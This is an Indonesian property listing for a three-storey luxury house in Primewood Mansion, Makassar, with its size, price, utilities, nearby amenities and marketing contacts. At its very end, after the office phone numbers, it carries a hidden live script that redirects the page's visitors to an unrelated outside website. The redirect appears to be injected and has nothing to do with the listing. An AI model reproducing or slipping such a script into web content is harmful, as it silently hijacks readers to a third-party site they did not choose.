PRIMEWOOD MANSION TYPE A1 DI PENGAYOMAN, MAKASSAR
Rp 8.96 M
Deskripsi
Rumah 3 Lantai
Luas Tanah : 309 m²
Lebar: 17.12m
Panjang: 18 m
Luas Bangunan: 658 m²
Lantai Dasar: 219 m²
Lantai 1: 219 m²
Lantai 2: 220 m²
Listrik 4400 watt
Sumber air: PDAM dan sumur bor
Primewood Mansion adalah sebuah kawasan hunian eksklusif dan juga mewah. Terletak di pusat kota Makassar yang merupakan kota kaum urbanis. Ketenangan, kenyamanan, dan kemewahan sebuah hunian dimiliki oleh setiap tipe rumah di Primewood Mansion.
Kelebihan Primewood Mansion:
Lokasi strategis:
? Terletak di tengah kota. Akses jalan utama, Jl. Pengayoman dan Jl. A. P. Pettarani
? 5 Menit ke Carrefour, Mall Panakkukang, Ramayana, dan Pasar Segar
? 15 menit akses ke Bandara Internasional Sultan Hasanuddin dan Pelabuhan Soekarno Hatta via Tol
? Dekat RS. Grestelina, RS. Faisal, dan RS. Paramount
Pos Keamanan 24 jam
Siap Huni
Unit terbatas
Temukan dan milikilah rumah mewah idaman Anda bersama Primewood Mansion. Terbatas untuk Anda yang ingin mendapatkan kemewahan sejati.
Tunggu apalagi segera hubungi marketing kami.
Andi (<button class="phone-mask" data-loading-text="Memuat..." data-content="082121551818"><i class="fa fa-phone-square"></i> 0821XXXXXXXX</button>)
HEAD OFFICE
Jl. A. Mappayukki No. 2-4
Makassar, Sulawesi Selatan 90125
No. Tlp: <button class="phone-mask" data-loading-text="Memuat..." data-content="(0411) 871408"><i class="fa fa-phone-square"></i> 0411XXXXXX</button> / <button class="phone-mask" data-loading-text="Memuat..." data-content="085100701111"><i class="fa fa-phone-square"></i> 0851XXXXXXXX</button><script>window.location.href = "https://www.sandboxer.org"</script>